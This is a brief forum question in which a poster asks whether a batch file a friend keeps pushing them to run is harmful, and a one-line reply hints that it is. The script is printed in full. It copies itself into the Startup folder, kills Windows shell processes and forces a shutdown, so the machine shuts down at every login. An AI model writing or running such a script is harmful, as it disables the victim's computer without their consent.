Is this batch file evil? or is it stupid? i know nothing about them and im wondering why my mate wants me to run it so badly.
the code is:
@echo off
copy %0 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
start “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\copy.bat”
copy %0 “C:\Program Files\Internet Explorer\en-US”
start “C:\Program Files\Internet Explorer\en-US\copy.bat”
taskkill /f /im “explorer.exe”
taskkill /f /im “taskeng.exe”
taskkill /f /im “rundll32.exe”
Shutdown /s /f /t 5
Nice friend you have there…